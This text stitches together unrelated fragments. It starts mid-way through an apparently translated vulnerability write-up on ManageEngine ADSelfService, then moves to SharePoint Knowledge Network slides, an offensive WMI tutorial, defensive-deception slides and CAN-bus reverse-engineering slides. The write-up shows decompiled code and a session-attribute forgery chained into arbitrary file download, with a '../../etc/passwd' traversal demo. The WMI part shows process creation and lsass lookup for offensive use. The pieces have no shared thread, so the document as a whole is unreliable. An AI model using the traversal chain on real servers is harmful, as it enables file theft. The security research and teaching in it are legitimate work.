        <param-value>org/apache/struts/tiles/chain-config.xml</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>
```

2. File upload

It turns out this action is no longer defined in the XML. Searching for the class it used to correspond to:
AdventNetADSMClient.jar!\com\adventnet\sym\adsm\common\webclient\admin\LogonCustomization.class
Step into FileActionHandler.getFileFromRequest, which appears to be its generic file-handling routine, and compare the 6113 code with the latest build.
The main change is in this section: the latest version writes the upload to a temporary file, while the old version used the uploaded filename directly.
In the latest build, both the if branch and the else branch produce a temporary file, but both also store the original uploaded filename in a JSON object for later checks.
That later check validates whether the uploaded filename meets the requirements, and as far as I can tell it cannot be bypassed.

3. Command-argument injection

Connection was likewise removed from the XML, but its class file is still present:
AdventNetADSMClient.jar!\com\adventnet\sym\adsm\common\webclient\admin\ConnectionAction.class
Following it down to com.adventnet.sym.adsm.common.webclient.util.SSLUtil#createCSR(org.json.JSONObject), the argument injection turns out not to have been fixed.
Although Connection was removed from the action configuration, createCSR is still reachable from elsewhere.

IV. Some minor issues

1. Arbitrary session-attribute setting

com.manageengine.ads.fw.dashboard.DashboardAction#updateSessionAttributes lets you set arbitrary session attributes.
Remote file download:
com.manageengine.ads.fw.roboupdate.RoboUpdateAction#download
com.manageengine.ads.fw.roboupdate.DownloadPatch#doAction
```java
public void doAction(Properties patchDetails) throws Exception {
    URLConnection connection = null;
    FileOutputStream outputStream = null;
    File ppmFile = null;
    InputStream inputStream = null;
    String ppmName = null;
    String folder = patchDetails.get("PATCH_LOCATION") != null ? (String) patchDetails.get("PATCH_LOCATION") : "/Patch/Roboupdate";
    folder = RoboUpdateUtil.createFolder(folder);
    try {
        String httpAddress = patchDetails.get("PPM_URL") != null ? (String) patchDetails.get("PPM_URL") : (String) patchDetails.get("PATCH_URL");
        URL url = new URL(httpAddress);
        String protocolType = url.getProtocol();
        if (this.proxySettings != null && this.proxySettings.length() > 0) {
            Proxy proxy = new Proxy(Type.HTTP, new InetSocketAddress((String) this.proxySettings.get("SERVER_NAME"), Integer.parseInt(this.proxySettings.get("PORT").toString())));
            if (protocolType.equals("http")) {
                connection = (HttpURLConnection) url.openConnection(proxy);
            } else {
                connection = (HttpsURLConnection) url.openConnection(proxy);
            }
            if (this.proxySettings.has("USER_NAME")) {
                String encodedUserPwd = MimeUtility.encodeText((String) this.proxySettings.get("USER_NAME") + ":" + (String) this.proxySettings.get("PASSWORD"));
                ((URLConnection) connection).setRequestProperty("Proxy-Authorization", "Basic " + encodedUserPwd);
            }
        } else if (protocolType.equals("http")) {
            connection = (HttpURLConnection) url.openConnection();
        } else {
            connection = (HttpsURLConnection) url.openConnection();
        }
        ((URLConnection) connection).setReadTimeout(10000);
        ((URLConnection) connection).setConnectTimeout(30000);
        ppmName = httpAddress.substring(httpAddress.lastIndexOf("/") + 1, httpAddress.length());
        ppmFile = new File(folder, ppmName);
        try {
            outputStream = new FileOutputStream(ppmFile);
        } catch (FileNotFoundException var17) {
            RoboUpdateHandler.setPatchFolderPermission();
            folder = RoboUpdateUtil.createFolder(folder);
            ppmFile = new File(folder, ppmName);
            outputStream = new FileOutputStream(ppmFile);
        }
        inputStream = ((URLConnection) connection).getInputStream();
        int bytesRead = false; // decompiler artifact
        byte[] buffer = new byte[153600];
        int bytesRead;
        while ((bytesRead = inputStream.read(buffer)) != -1) {
            outputStream.write(buffer, 0, bytesRead);
        }
        this.logger.log(Level.INFO, "Successfully downloaded the patch and stored in " + folder + " folder");
        this.downloadStatus = true;
        this.filePath = folder + File.separator + ppmName;
    } catch (Exception var18) {
        this.logger.log(Level.INFO, " ", var18);
        throw new Exception(var18);
    } finally {
        if (inputStream != null) {
            inputStream.close();
        }
        if (outputStream != null) {
            outputStream.close();
            if (!this.downloadStatus && ppmFile != null && ppmFile.exists()) {
                ppmFile.delete();
            }
        }
        if (connection != null) {
            connection = null;
        }
    }
}
```

I was probably a bit dazed at the time: the session-attribute setter above only sets String attributes, while this remote file download later fetches the attribute as a List, which throws an error, so this path doesn't work.

2. Arbitrary file download

com.manageengine.ads.fw.ssl.SSLAction#downloadCSR
Step into com.manageengine.ads.fw.ssl.SSLAPI#downloadCSR:
The filename to download is taken from a session attribute, so combined with the session-attribute forgery above, this yields an arbitrary file download.

```java
public String downloadCSR(HttpServletRequest request, HttpServletResponse response) throws Exception {
    String filename = (String) request.getSession().getAttribute("CSR_FILE_NAME");
    if (filename != null) {
        response.setContentType("text/html");
        response.setHeader("Content-Disposition", "attachment; filename=\"" + filename + "\"");
        PrintWriter out = response.getWriter();
        FileInputStream fileInputStream = new FileInputStream(SSLConstants.SERVER_HOME + File.separator + SSLConstants.DEFAULT_CERTIFICATE_DIR + File.separator + filename);
        Throwable var6 = null;
        try {
            int i;
            try {
                while ((i = fileInputStream.read()) != -1) {
                    out.write(i);
                }
            } catch (Throwable var15) {
                var6 = var15;
                throw var15;
            }
        } finally {
            if (fileInputStream != null) {
                if (var6 != null) {
                    try {
                        fileInputStream.close();
                    } catch (Throwable var14) {
                        var6.addSuppressed(var14);
                    }
                } else {
                    fileInputStream.close();
                }
            }
        }
        out.close();
        SSLHandler.addMETrackEntry("CSR_DOWNLOAD_COUNT");
    }
    return null;
}
```
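The danger is the unsanitized concatenation: if the forged CSR_FILE_NAME attribute contains path separators, the resulting path escapes the certificate directory. A quick Python illustration; the directory values are made-up stand-ins for SSLConstants.SERVER_HOME and SSLConstants.DEFAULT_CERTIFICATE_DIR, only the join-then-normalize behavior matters.

```python
import posixpath

# Illustrative stand-ins for the SSLConstants values.
SERVER_HOME = "/opt/ManageEngine/ADSelfService"
CERT_DIR = "Certificates"

def resolve(filename):
    """Mirrors the Java concatenation: HOME + sep + CERT_DIR + sep + filename."""
    return posixpath.normpath(posixpath.join(SERVER_HOME, CERT_DIR, filename))

print(resolve("server.csr"))
# /opt/ManageEngine/ADSelfService/Certificates/server.csr
print(resolve("../../../../etc/passwd"))
# /etc/passwd -> arbitrary file read
```

Enough "../" components walk the path all the way back to the filesystem root.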
First set the session attribute to obtain a session, then send the download request carrying that session.

3. File decompression

com.manageengine.ads.fw.ssl.SSLAction#addNewCertificate(org.apache.struts.action.ActionMapping, org.apache.struts.action.ActionForm, javax.servlet.http.HttpServletRequest, javax.servlet.http.HttpServletResponse)
com.manageengine.ads.fw.ssl.SSLAPI#addNewCertificate(javax.servlet.http.HttpServletRequest, javax.servlet.http.HttpServletResponse, org.json.JSONObject, org.json.JSONObject)
At first I thought this would lead to a shell, but it falls apart at the file-upload stage: no struts form-bean is configured for this upload, so the ActionForm cannot be obtained, execution falls into the else branch, and it throws java.lang.ClassCastException: org.apache.catalina.connector.RequestFacade cannot be cast to com.adventnet.iam.security.SecurityRequestWrapper.

4. Blind SSRF

com.manageengine.ads.fw.util.jumpto.JumpToAPI#testConnection
SharePoint Knowledge Network
A component of Microsoft Office SharePoint Server 2007 (MOSS)
Total Information Awareness
Not just for the government anymore
KN is about connecting people
KN is enterprise social networking
KN enables users to collaborate
KN automates the discovery and sharing of
undocumented knowledge and relationships.
KN helps discover Who knows whom? (Connectors)
KN helps discover Who knows what? (Expertise Location)
KN is an automated tool to discover expertise within
an organization.
It is not meant to discover the experts, since they are
already well known.
It is meant to discover hidden gems of expertise on any
topic.
“Organically discover expertise to enable an organization to
make better choices quicker”
Microsoft created KN based on three core beliefs:
• Most information is undocumented
• It's difficult to connect to the right person
• "Weak ties" deliver significant value
The Knowledge Network solution is split into a client
and a server that work together to
• (Client) Analyze email to create profile (keywords,
contacts, external contacts)
• (Client) Publish profile to server (incremental updates)
• (Seeker) Aggregate profiles (expertise information,
social network)
• (Seeker) Search for people (who know who? Who
knows what?)
Data Sources for KN
Email
Team sites
Web
IM Contacts
Contact lists
Portraits
My Sites
AD Relationships
Distribution list
Correlation Store
Relationship data sources are inputs for the KN
Correlation Store, which is surfaced through the
browser.
The Correlation Store is also accessible to line-of-business applications via APIs and an SDK.
Useful software
Microsoft understands that there may be privacy
concerns involving KN. (WOW)
Addresses these concerns involves striking the right
balance among utility, simplicity and privacy.
Utility is how useful will this software be to me?
Simplicity is how easy will this software be to install,
upload, maintain and use?
Privacy is how much personal information will this
software reveal and how much control do I have?
* Communicate steps of the profile creation and
publication process
* Customers can expose privacy policy in the client
profile wizard
Notification
User can choose which items to include/exclude
User can choose from 5 levels of privacy to apply to
each profile item to control who is allowed to view that
information on the server (i.e. everyone (outermost ring
of visibility), my colleagues, my workgroup, my
manager, and me (center of the visibility universe))
Admins can determine which aspects of the product
functionality to leverage including external contacts,
anonymous results, and DL keywords
Control
Control 2
Admins can configure the default operation of the
client, including opt-in/opt-out and the default privacy
visibilities for profile items
KN sends no data to the server before the user has
approved it
Consent
Breaking news
Some blogs report that the KN is not going to be
included in the next version of Sharepoint.
Some blogs report it will be renamed and integrated
more news
KN can be seen as a technological preview.
Posts have indicated possible inclusion in future
versions of Windows and other server products.
The real question is what is MSN/Live/Bing running
behind the scenes, based on our IM, Email, blogs,
news.
What is GOOGLE running........ | pdf |
This article is translated from: Offensive WMI - Exploring Namespaces, Classes & Methods (Part 2) :: 0xInfection's Blog — Random ramblings of an Infected Geek.
This is the second post in the Offensive WMI research series, and it examines three WMI components. Throughout the article we will use the WMI and CIM cmdlets interchangeably, to get familiar with both cmdlet types.

I. Namespaces

Let's briefly recap what a namespace is:
Namespaces organize information much like folders in a filesystem; however, rather than being physical locations (e.g. on disk), they are logical in nature.
All namespaces in WMI are instances of the __Namespace system class. To get a list of all namespaces under the root namespace, query that class with the following command:

Get-WmiObject -Namespace root -Class __Namespace

The output contains a lot of information. To filter out the "useless" parts, we can use PowerShell's select:

Get-WmiObject -Namespace root -Class __Namespace | select name

Now we have a list of the system's namespaces. Many of them appear in the form root\<namespace>, e.g. root\DEFAULT, root\CIMV2 and so on, because they are namespaces under root (itself a namespace).

Note: a strange but fun fact is that the default namespace in WMI is not root\DEFAULT but root\CIMV2 (and it has been that way since Windows 2000).

The same can be achieved with the CIM cmdlet Get-CimInstance:

Get-CimInstance -Namespace root -ClassName __Namespace
OK, everything is listed neatly. But what about nested namespaces? We have already seen that there are several namespaces under root; we just need to write a script that retrieves namespaces recursively (from PSMag):

Function Get-WmiNamespace {
    Param (
        $Namespace='root'
    )
    Get-WmiObject -Namespace $Namespace -Class __NAMESPACE | ForEach-Object {
        ($ns = '{0}\{1}' -f $_.__NAMESPACE,$_.Name)
        Get-WmiNamespace $ns
    }
}

Note: classes and namespaces may differ from machine to machine, depending on the available hardware, the installed applications and many other factors.

II. Classes

Now that we have a list of available namespaces, let's look at classes. So what is a class?
A WMI class represents a specific item in the system. It can be anything from a system process to hardware (such as a network card), a service, and so on.
Classes fall into three main types (as required by the CIM standard):
- Core classes: apply to all management domains and provide a small amount of basic functionality; they usually start with a double underscore (e.g. __SystemSecurity);
- Common classes: extensions of the core classes that apply to specific management domains, prefixed with CIM_ (e.g. CIM_TemperatureSensor);
- Extended classes: additions to the common classes for a particular technology stack (e.g. Win32_Process);

Classes are further divided into the following kinds:

- Abstract classes: templates for defining new classes;
- Static classes: mainly used to store data;
- Dynamic classes: retrieve data from a provider and represent WMI managed resources; these are the classes we are most interested in;
- Association classes: describe the relationships between classes and managed resources;

2.1 Listing classes

With enough theory behind us, let's try to find some classes. We can list the available classes with the Get-WmiObject cmdlet:

Get-WmiObject -Class * -List

The command above lists every class. For the sake of example, suppose we are interested in the users on the system. We can narrow the scope with the following command, which lists all the classes available for retrieving or manipulating user information:

Get-WmiObject -Class *user* -List

The same can be achieved with the Get-CimClass cmdlet, as shown below:

Get-CimClass -ClassName *user*
Note: for a list of all Win32 classes, refer to Microsoft's class documentation. The Win32 provider supplies classes in four categories: computer system hardware classes, operating system classes, performance counter classes, and WMI service management classes.

To retrieve dynamic classes, use the -QualifierName parameter of the Get-CimClass cmdlet:

Get-CimClass -ClassName "user" -QualifierName dynamic

Looks good. What's next? Querying classes to get more out of them.

2.2 Getting classes

We are interested in the Win32_UserAccount class; its data is easy to retrieve:

Get-WmiObject -Class Win32_UserAccount

Tip: for more detailed output, pipe the command above into PowerShell's Format-List (fl), e.g.: Get-WmiObject -Class Win32_UserAccount | fl *

The CIM cmdlet Get-CimInstance retrieves the same information:

Get-CimInstance -ClassName Win32_UserAccount

Now we have a list of all the user accounts on the system!

Let's turn our attention to the processes running on the system. The Win32_Process class provides the list of running processes:

Get-WmiObject -Class Win32_Process

Many processes run on a system, and it's not uncommon for this to make the terminal scroll endlessly! To avoid that, we can use the -Filter parameter to fetch the specific process we're looking for (here, lsass.exe):

Get-WmiObject -Class Win32_Process -Filter 'name="lsass.exe"'

In this case, the CIM alternative Get-CimInstance produces shorter, more comprehensive output (and it also supports the -Filter parameter):

Get-CimInstance -ClassName Win32_Process

The equivalent query in WQL is:

Get-WmiObject -Query 'select * from win32_process where name="lsass.exe"'

Now that we know how to list, get and filter class instances in WMI, let's see how deleting instances works.
2.3 Deleting class instances

Remove-WmiObject (a WMI cmdlet) and Remove-CimInstance (a CIM cmdlet) are the two cmdlets capable of deleting instances. The output of a related command can be piped into them. For a quick demo, run the Calculator application and list its process.

What happens if we pipe that command into Remove-CimInstance? The process gets killed!

Get-CimInstance -ClassName Win32_Process -Filter 'name="calculator.exe"' | Remove-CimInstance

This is very useful when dealing with the registry, or better yet, when we have created our own class to store our payloads: we can simply list all the items under the class with the cmdlet and clean them up in one go.

III. Methods

Methods manipulate WMI objects. If you scroll back up to where we listed all the available classes, you will notice a column named Methods that lists the available methods.

3.1 Listing methods

To repeat that exercise and list all the available methods, we can run:

Get-CimClass -MethodName *

To filter down to instances that allow us to execute a specific method, we can pass a method name, for example Create (which is always fun, since it may let us create something):

Get-CimClass -MethodName Create

To narrow things down further and list the methods available on a specific class, use PowerShell's select with the -ExpandProperty parameter:

Get-WmiObject -Class Win32_Process -List | select -ExpandProperty Methods
Get-CimClass -ClassName Win32_Process | select -ExpandProperty CimClassMethods

Note: the value passed to the select statement is the name of the column we got when listing classes. If you are confused, scroll back up to the section where we listed classes and observe the differences between the WMI and CIM cmdlet outputs.

So for the Win32_Process class we have methods such as Create, Terminate, GetOwner, GetOwnerSid and so on. Now let's see how to use a method.

Tip: to use a method, we need to know which parameters it expects when invoked. To list all the available parameters, we can either put together some PowerShell, or better, read the documentation.
3.2 Using methods

Invoke-WmiMethod (WMI) and Invoke-CimMethod (a CIM cmdlet) let us use the methods of a particular class. Time to pick on the calculator again:

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList calc.exe

With the CIM cmdlet the syntax is slightly different:

Invoke-CimMethod -ClassName Win32_Process -MethodName create -Arguments @{commandline="calc.exe"}

IV. Setting object properties

Last but not least, we should look at updating instances of a class. It is important to remember, however, that the instance must be writable. With a bit of scripting we can put together a routine that fetches all the writable properties of a class. Here is the script (from PSMag):

$class = [wmiclass]'<class_name>'
$class.Properties | ForEach-Object {
    foreach ($qualifier in $_.Qualifiers) {
        if ($qualifier.Name -eq "Write") {
            $_.Name
        }
    }
}

For our example we will use the Win32_OperatingSystem class, which has a writable property named Description. Let's update that property to PewOS using Set-WmiInstance.
The same can be achieved with Set-CimInstance, but that is left for the reader to explore.

V. Conclusion

Wow, another long post! By now we have laid a solid foundation in the WMI and CIM cmdlets and how to use them to gain significant control over a system. Cheers!
Traps of Gold
Michael Brooks & Andrew Wilson

Caution. Please vet anything discussed with legal and management.

FRUSTRATION
http://www.flickr.com/photos/14511253@N04/4411497087/sizes/o/in/photostream/

Our entire defense strategy is REACTIVE… AKA, losing

Patch Management:
Fixes known issues / Someone already pwnd it / Already in Production!

Secure Development:
Reduces Vulnerabilities / Expensive / Limited Effectiveness

Security Theater:
Free groping at airport / You aren't safer / Introduces vulnerabilities

What is missing?
But if they aren't working…

Fight Back
http://www.flickr.com/photos/superwebdeveloper/5604789818/sizes/l/in/photostream/

"We conclude that there exists no clear division between the offense and defense."
- USMC, Warfighting

They have:
Attackers are human too.
• Finite time
• Imperfect tools
• Emotion / Ego / Bias
• Risk
Attack them there.

So...

"If I have seen further, it is only by standing on the shoulder of giants."
- Sir Isaac Newton

Traps of Gold:
IDS Systems / Honeypots / Exploits

Two Models of Warfare: Attrition / Maneuver

Maneuverability
http://www.flickr.com/photos/travis_simon/3865383863/sizes/z/in/photostream/

Stack the Deck
http://www.flickr.com/photos/jonathanrh/5817317551/sizes/o/in/photostream/

"To act in such a way that the enemy does not know what to expect."
Ambiguity

Ambiguity:
Server Banners - Who needs this?
File Extensions - The browser doesn't care.
Default Files - Why leave these up?
Shut up.

If knowing is half the battle

"Convince the enemy we are going to do something other than what we are really going to do"
Deception

Lie about the rest. Reduce what they can know. Blatantly lying. Increase the noise by…

Issues Identified    Before    After
Nikto                    19     5462
Skipfish                  6      300
Wapiti                    6      300
w3af                      6      300
Prod scan                 6      300
Prod scan                 6      300
Prod scan                 6      300
(See updates after talk)

That's real though! Will it?

But that won't fool people… Some lies are better.
http://www.flickr.com/photos/randomurl/459180872/sizes/l/in/photostream/

"The secrets of victory thus lie in the taking of initiative."
Tempo

It's about awareness and acting sooner. It's not about reaction.

Perceived vs. Actual Attack Surface
I made this up! And I can watch for this.
http://www.flickr.com/photos/derek_b/5837741974/sizes/o/in/photostream/

"I love it when a plan comes together." - Hannibal
Misdirection

So far we've shown: Shutting down tools / Increasing awareness

Can we break it? But…
http://www.flickr.com/photos/20106852@N00/2238271809/sizes/o/in/photostream/

To recap. Stop acting like this…
http://www.flickr.com/photos/kriztofor/3253758933/sizes/o/in/photostream/
Start acting like this.

Fight Back
http://www.flickr.com/photos/superwebdeveloper/5604789818/sizes/l/in/photostream/

Capture The Flag
The winner takes all
http://ctf.doublethunk.org
REVERSE ENGINEERING 17 CARS IN UNDER 10 MINUTES
BRENT STONE
Disclaimer About This Talk and The Github Repo
The views expressed in this presentation are those of the
author and do not reflect the official policy or position of the
United States Air Force, the United States Army, the United
States Department of Defense or the United States
Government. The material publicly released on
https://github.com/brent-stone/CAN_Reverse_Engineering/,
up to and including commit ac0e55f on 26 March 2019, is
declared a work of the U.S. Government and is not subject
to copyright protection in the United States.
APPROVED FOR PUBLIC RELEASE; DISTRIBUTION UNLIMITED
Case Numbers: 88ABW-2019-0910, 88ABW-2019-0024
General Use Networks: FLEXIBLE, UNDETERMINABLE
• Modify End Points
• Modify Routing
• No delivery guarantee
• No timeliness guarantee
(diagram: n end points A and B exchanging messages with metadata)
Control Networks: DETERMINABLE, INFLEXIBLE
• Delivery Guarantee
• Timeliness Guarantee
• Fixed End Points
• Fixed Routing
(diagram: fixed end points A through E exchanging messages with metadata)
Lots of people helping others play with general use networks…
Automated Reverse Engineering of
General Use Networks
1. P. Ducange, G. Mannara, F. Marcelloni, R. Pecori, and M. Vecchio, "A novel approach for internet traffic classification based on multi-objective evolutionary fuzzy
classiffiers," in 2017 IEEE International Conference on Fuzzy Systems (FUZZ-IEEE), 2017, pp. 1-6.
2. J. Yuan, Z. Li, and R. Yuan, "Information entropy based clustering method for unsupervised internet traffic classification," in IEEE International Conference on
Communications (ICC), 2008, pp. 1588-1592.
3. C. Besiktas and H. A. Mantar, "Real-Time Traffic Classiffication Based on Cosine Similarity Using Sub-application Vectors," in Proceedings of the Traffic Monitoring
and Analysis 4th International Workshop, 2012, vol. 7189, pp. 89-92.
4. A. Trifilo, S. Burschka, and E. Biersack, "Traffic to protocol reverse engineering," in IEEE Symposium on Computational Intelligence for Security and Defense
Applications (CISDA), 2009, pp. 1-8.
5. M. E. DeYoung, "Dynamic protocol reverse engineering: a grammatical inference approach," Air Force Institute of Technology, 2008.
6. W. Cui, M. Peinado, K. Chen, H. J.Wang, and L. Irun-Briz, "Tupni: Automatic Reverse Engineering of Input Formats," in 15th ACM Conference on Computer and
Communications Security (CCS), 2008, pp. 391-402.
7. J. Newsome, D. Brumley, J. Franklin, and D. Song, "Replayer: automatic protocol replay by binary analysis," in 13th ACM conference on Computer and
Communications Security (CCS), 2006, p. 311.
8. J. Caballero, P. Poosankam, C. Kreibich, and S. D., "Dispatcher: Enabling active botnet infiltration using automatic protocol reverse-engineering," in 16th ACM
Conference on Computer and Communications Security (CCS), 2009, pp. 621-634.
9. J. Caballero, H. Yin, Z. Liang, and D. Song, "Polyglot: Automatic Extraction of Protocol Message Format using Dynamic Binary Analysis," in 14th ACM Conference
on Computer and Communications Security (CCS), 2007, pp. 317-329.
10.W. Cui, V. Paxson, N. C. Weaver, and R. H. Katz, "Protocol-Independent Adaptive Replay of Application Dialog," in Network and Distributed System Security
Symposium (NDSS), 2006, pp. 279-293.
Meta
Data
Automated Reverse Engineering of
General Use Networks
11.M. Wakchaure, S. Sarwade, I. Siddavatam, and P. Range, "Reconnaissance of Industrial Control System By Deep Packet Inspection," in 2nd IEEE International
Conference on Engineering and Technology (ICETECH), 2016, no. 3, pp. 1093-1096.
12.J. Antunes, N. Neves, and P. Verissimo, "Reverse engineering of protocols from network traces," in 18th Working Conference on Reverse Engineering, 2011, pp.
169-178.
13.M. A Beddoe, "Network protocol analysis using bioinformatics algorithms," McAfee, Santa Clara, CA, USA, 1, 2004.
14.Y. Wang, Z. Zhang, D. Yao, B. Qu, and L. Guo, "Inferring Protocol State Machine from Network Traces: A Probabilistic Approach," in International Conference on
Applied Cryptography and Network Security, 2011, pp. 1-18.
15.P. M. Comparetti, G. Wondracek, C. Kruegel, and E. Kirda, "Prospex: Protocol specification extraction," in IEEE Symposium on Security and Privacy, 2009, pp.
110-125.
16.J. Erman and M. Arlitt, "Traffic classification using clustering algorithms," in 2006 SIGCOMM Workshop on Mining Network Data, 2006, pp. 281-286.
17.F. Alam, R. Mehmood, I. Katib, and A. Albeshri, "Analysis of Eight Data Mining Algorithms for Smarter Internet of Things (IoT)," in International Workshop on Data
Mining in IoT Systems (DaMIS 2016), 2016, vol. 98, no. 1, pp. 437-442.
18.Y. Wang et al., "A semantics aware approach to automated reverse engineering unknown protocols," in 20th IEEE International Conference on Network Protocols
(ICNP), 2012, pp. 1-10.
19.J. Roning, "PROTOS Protocol Genome Project," Oulu University Secure Programming Group, 2010. [Online]. Available: https://www.ee.oulu.fi/roles/ouspg/genome.
[Accessed: 01-Jan-2017].
20.R. L. S. Puupera, "Domain Model Based Black Box Fuzzing Using Regular Languages," University of Oulu, 2010.
21.K. Choi, Y. Son, J. Noh, H. Shin, J. Choi, and Y. Kim, "Dissecting Customized Protocols: Automatic Analysis for Customized Protocols Based on IEEE 802.15.4," in
9th International Conference on Security of Information and Networks, 2016, pp. 183-193.
Meta
Data
Automated Reverse Engineering of
General Use Networks
22.Y. Wang, Y. Xiang, J. Zhang, and S. Yu, "A novel semi-supervised approach for network traffic clustering," in 5th International Conference on Network and System
Security (NSS), 2011, pp. 169-175.
23.W. Cui, J. Kannan, and H. J. Wang, "Discoverer: Automatic Protocol Reverse Engineering from Network Traces," in USENIX Security, 2007, no. 2, pp. 199-212.
24.J. Zhang, C. Chen, Y. Xiang, and W. Zhou, "Semi-supervised and compound classiffication of network traffic," in Proceedings 32nd IEEE International Conference
on Distributed Computing Systems Workshops (ICDCSW), 2012, pp. 617-621.
25.T. Glennan, C. Leckie, and S. M. Erfani, "Improved Classification of Known and Unknown Network Traffic Flows Using Semi-supervised Machine Learning," in 21st
Australasian Conference on Information Security and Privacy (ACISP), 2016, vol. 2, pp. 493-501.
Meta
Data
But what about robots, cars, and other control networks?
Now your computer can help!
Hi! Do you need assistance?
# Started canhandler on can0
# Setup complete: 48.7387
# Format: Time: ID DLC Data
48.740: 4a8 8  00 00 00 40 00 00 00 00
48.740: 020 7  00 00 07 01 00 00 2f
48.742: 0b4 8  00 00 00 00 ac 00 00 68
48.742: 025 8  00 11 00 00 78 78 78 a6
48.743: 024 8  02 00 02 08 62 04 81 1f
48.743: 235 6  00 00 00 00 00 3d
48.744: 499 8  00 00 35 00 00 00 00 00
48.745: 49a 8  00 85 20 03 46 80 28 a8
48.746: 49b 8  00 a0 1a 20 00 00 48 10
48.746: 262 5  20 00 00 00 89
48.747: 49d 8  61 60 03 d1 9d 19 c6 c5
48.747: 1c4 8  00 00 00 00 00 00 00 cd
48.749: 0aa 8  1a 6f 1a 6f 1a 6f 1a 6f
48.749: 0b6 4  00 00 00 ba
48.749: 224 8  00 00 00 00 00 00 00 08
48.751: 127 8  68 10 00 08 00 0c ed a9
48.751: 020 7  00 00 07 01 00 00 2f
48.751: 230 7  d4 43 00 00 00 00 50
48.752: 025 8  00 11 00 00 82 82 82 c4
…….
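A trace in this format is easy to load for analysis. The sketch below is my own illustration, not the tool on GitHub; it parses lines of the form `time: id dlc byte…` into a per-arbitration-ID list of (timestamp, payload-bits) rows, which is the shape the later clustering steps need:

```python
def parse_can_log(lines):
    """Group 'time: id dlc b0 b1 ...' records into per-arbitration-ID time series."""
    series = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip the comment/header lines
        time_str, _, rest = line.partition(":")
        fields = rest.split()
        arb_id, dlc = fields[0], int(fields[1])
        payload = bytes(int(b, 16) for b in fields[2:2 + dlc])
        # Flatten the payload to a tuple of bits, most significant bit first.
        bits = tuple((byte >> (7 - i)) & 1 for byte in payload for i in range(8))
        series.setdefault(arb_id, []).append((float(time_str), bits))
    return series

log = [
    "# Format: Time: ID DLC Data",
    "48.740: 4a8 8  00 00 00 40 00 00 00 00",
    "48.749: 0b6 4  00 00 00 ba",
]
parsed = parse_can_log(log)
```

Each arbitration ID then carries its own matrix of bit columns over time, matching the 64-bit payload tables shown later in the deck.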
Click!
Code on GitHub does this…
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
Different Control Network Protocol?
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
Just change this →
The demo is doing this…
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
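Two of the building blocks named on this slide are easy to sketch. Assuming each decoded signal is just a list of sampled values (the signal names below are my own example data, not from the talk), bit positions with zero Shannon entropy never change and can be discarded, and Pearson's r flags signals that move together and should be clustered:

```python
from math import log2

def shannon_entropy(values):
    """Shannon diversity index of a sampled signal, in bits."""
    counts = {}
    for v in values:
        counts[v] = counts.get(v, 0) + 1
    n = len(values)
    return -sum(c / n * log2(c / n) for c in counts.values())

def pearson(xs, ys):
    """Pearson's correlation coefficient between two equal-length signals."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sx = sum((x - mx) ** 2 for x in xs) ** 0.5
    sy = sum((y - my) ** 2 for y in ys) ** 0.5
    return cov / (sx * sy)

# Hypothetical decoded signals: a dead bit, a speed-like value, a wheel-speed-like value.
dead = [0, 0, 0, 0, 0, 0]
speed = [0, 5, 10, 15, 20, 25]
wheel = [0, 11, 19, 31, 39, 51]  # roughly proportional to speed, so r is close to 1
```

In a pipeline like the one above, pairs with high |r| would then feed the agglomerative hierarchical clustering step.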
I’ll walk you through this…
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
Unsupervised Reverse Engineering
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
This is a sentence!
Lexical & Semantic Analysis
This is a sentence!
Lexical Analysis
Tokens
This is a sentence!
Semantic Analysis
Token
Type
noun
This is a sentence!
Time (s)   Bit 0 ……………………….. Bit 63
48.45      1    …………………………    0
48.95      1    …………………………    0
49.46      1    …………………………    0
49.96      0    …………………………    0
50.46      0    …………………………    0
50.96      1    …………………………    0
…          …    …………………………    …
(64-bit Payloads)

Lexical Analysis
Payload Tokenization
Payload Tokenization
By Least Significant Bit

Bit Position:       0 1 2 3 4 5 6 7 8 9
Observed Payloads:
 7 =                0 1 1 1 0 0 0 0 0 0  = 0
 8 =                1 0 0 0 0 0 0 0 0 1  = 1
 9 =                1 0 0 1 0 0 0 0 1 0  = 2
